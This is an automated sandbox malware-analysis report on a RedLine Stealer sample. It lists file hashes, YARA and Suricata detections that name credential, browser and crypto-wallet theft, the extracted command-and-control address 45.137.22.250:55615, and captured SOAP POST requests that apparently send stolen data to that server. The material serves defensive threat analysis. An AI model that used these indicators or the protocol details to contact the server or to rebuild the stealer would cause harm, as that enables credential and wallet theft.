Edit tour

Windows Analysis Report
ljMiHZ8MwZ.exe

Overview

General Information

Sample name:	ljMiHZ8MwZ.exe renamed because original name is a hash value
Original sample name:	4153363158f713a02e405d251823c0c3.exe
Analysis ID:	1581021
MD5:	4153363158f713a02e405d251823c0c3
SHA1:	35168f14fa36d3f8d15614cb25a78415015691d1
SHA256:	a040d59da6528f88ded3b130199a23f33f01e9b049b89c0cceaabc5c6984bb26
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

ljMiHZ8MwZ.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\ljMiHZ8MwZ.exe" MD5: 4153363158F713A02E405D251823C0C3)

ljMiHZ8MwZ.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\ljMiHZ8MwZ.exe" MD5: 4153363158F713A02E405D251823C0C3)

conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.22.250:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x140ba:$a4: get_ScannedWallets 0x2beda:$a4: get_ScannedWallets 0x43afa:$a4: get_ScannedWallets 0x12f18:$a5: get_ScanTelegram 0x2ad38:$a5: get_ScanTelegram 0x42958:$a5: get_ScanTelegram 0x13d3e:$a6: get_ScanGeckoBrowsersPaths 0x2bb5e:$a6: get_ScanGeckoBrowsersPaths 0x4377e:$a6: get_ScanGeckoBrowsersPaths 0x11b5a:$a7: <Processes>k__BackingField 0x2997a:$a7: <Processes>k__BackingField 0x4159a:$a7: <Processes>k__BackingField 0xfa6c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2788c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3f4ac:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1148e:$a9: <ScanFTP>k__BackingField 0x292ae:$a9: <ScanFTP>k__BackingField 0x40ece:$a9: <ScanFTP>k__BackingField
Process Memory Space: ljMiHZ8MwZ.exe PID: 7348	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ljMiHZ8MwZ.exe PID: 7348	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ljMiHZ8MwZ.exe PID: 7348	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: ljMiHZ8MwZ.exe PID: 7348	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x831f3:$a4: get_ScannedWallets 0x8209a:$a5: get_ScanTelegram 0x82e7c:$a6: get_ScanGeckoBrowsersPaths 0x80d2d:$a7: <Processes>k__BackingField 0x7e260:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x80661:$a9: <ScanFTP>k__BackingField
Process Memory Space: ljMiHZ8MwZ.exe PID: 7532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ljMiHZ8MwZ.exe PID: 7532	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: ljMiHZ8MwZ.exe PID: 7532	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x4b2ae2:$a4: get_ScannedWallets 0x4b1989:$a5: get_ScanTelegram 0x4b276b:$a6: get_ScanGeckoBrowsersPaths 0x4b061c:$a7: <Processes>k__BackingField 0x4adb4f:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x4aff50:$a9: <ScanFTP>k__BackingField
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.ljMiHZ8MwZ.exe.4210910.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ljMiHZ8MwZ.exe.4210910.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.ljMiHZ8MwZ.exe.4210910.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.ljMiHZ8MwZ.exe.4210910.2.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.ljMiHZ8MwZ.exe.4210910.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
2.2.ljMiHZ8MwZ.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.ljMiHZ8MwZ.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.ljMiHZ8MwZ.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
2.2.ljMiHZ8MwZ.exe.400000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
2.2.ljMiHZ8MwZ.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x295eb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x2961f:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x29648:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x2b887:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x2ae03:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x2b14b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x2aa81:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x2826f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x20358:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x20d38:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet
0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x4300a:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x41e68:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x42c8e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0x40aaa:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3e9bc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField 0x403de:$a9: <ScanFTP>k__BackingField
0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x297eb:$gen01: ChromeGetRoamingName 0x4140b:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x2981f:$gen02: ChromeGetLocalName 0x4143f:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x29848:$gen03: get_UserDomainName 0x41468:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x2ba87:$gen04: get_encrypted_key 0x436a7:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x2b003:$gen05: browserPaths 0x42c23:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x2b34b:$gen06: GetBrowsers 0x42f6b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x2ac81:$gen07: get_InstalledInputLanguages 0x428a1:$gen07: get_InstalledInputLanguages
0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x3feca:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x43581:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x38b70:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x42ab9:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers
Click to see the 20 entries

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T17:42:14.044425+0100	2045000	1	Malware Command and Control Activity Detected	45.137.22.250	55615	192.168.2.4	49733	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T17:42:18.234335+0100	2045001	1	Malware Command and Control Activity Detected	45.137.22.250	55615	192.168.2.4	49733	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T17:42:08.895593+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49733	45.137.22.250	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T17:42:14.359736+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49733	45.137.22.250	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T17:42:18.634917+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.137.22.250	55615	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T17:42:08.895593+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.4	49733	45.137.22.250	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["45.137.22.250:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: ljMiHZ8MwZ.exe	Virustotal: Detection: 34%			Perma Link
Source: ljMiHZ8MwZ.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: ljMiHZ8MwZ.exe

Joe Sandbox ML: detected

Source: ljMiHZ8MwZ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: ljMiHZ8MwZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: WINLOA~1.PDBwinload_prod.pdbF@ source: ljMiHZ8MwZ.exe, 00000002.00000002.1875228155.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49733 -> 45.137.22.250:55615
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49733 -> 45.137.22.250:55615
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49737 -> 45.137.22.250:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.250:55615 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49733 -> 45.137.22.250:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.250:55615 -> 192.168.2.4:49733

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.137.22.250:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 45.137.22.250:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.250:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.250:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.250:55615Content-Length: 983075Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.250:55615Content-Length: 983067Expect: 100-continueAccept-Encoding: gzip, deflate

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
